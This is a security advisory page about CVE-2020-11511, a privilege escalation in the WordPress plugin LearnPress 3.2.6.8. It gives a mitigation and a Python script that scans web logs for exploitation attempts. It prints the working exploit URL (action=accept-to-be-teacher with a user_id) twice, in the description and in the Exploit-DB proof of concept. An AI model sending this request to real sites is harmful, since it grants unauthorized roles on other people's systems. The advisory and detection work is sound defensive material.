Vendor: LearnPress
By: nhattruong or nhattruong.blog
CVSS: 8.1 (HIGH)
Vulnerability Type: Privilege Escalation
CWE: 264
Product Name: LearnPress
Affected Version From: 3.2.6.8
Affected Version To: 3.2.6.8
Patch Exists: YES
Related CVE: CVE-2020-11511
CPE: a:thimpress:learnpress
Metasploit: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2021

WordPress Plugin LearnPress 3.2.6.8 – Privilege Escalation

WordPress plugin LearnPress version 3.2.6.8 is vulnerable to privilege escalation. A logged-in attacker who knows their own user ID can exploit this vulnerability by requesting http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

Mitigation:

Upgrade to version 3.2.6.9 or later
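
On a site that ran an affected version, the web server access log can show whether the request described above was ever made. The script below is an added example, not part of the original advisory or the Exploit-DB entry; it assumes Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jul/2021:10:01:02 +0000] "GET /wp-admin/?action=accept-to-be-teacher&user_id=42 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Jul/2021:10:01:09 +0000] "GET /wp-admin/?user_id=43&action=accept%2Dto%2Dbe%2Dteacher HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Jul/2021:10:02:00 +0000] "GET /wp-admin/?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Jul/2021:10:03:00 +0000] "GET /courses/?s=accept-to-be-teacher HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status of a combined-format entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_teacher_role_requests(log_text):
    """Return one dict per logged request whose query string carries
    action=accept-to-be-teacher together with a user_id parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        # parse_qs percent-decodes names and values, so an encoded
        # action value and a different parameter order still match.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if "accept-to-be-teacher" in query.get("action", []) and "user_id" in query:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),
                "user_ids": query["user_id"],
            })
    return hits

if __name__ == "__main__":
    for hit in find_teacher_role_requests(SAMPLE_LOG):
        print(hit)
```

Only parameters sent in the URL appear in an access log, so a clean result does not rule out requests that carried them in a request body. Any hit dated before the upgrade to 3.2.6.9 is a reason to review the accounts listed in `user_ids`.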

Exploit-DB raw data:

# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!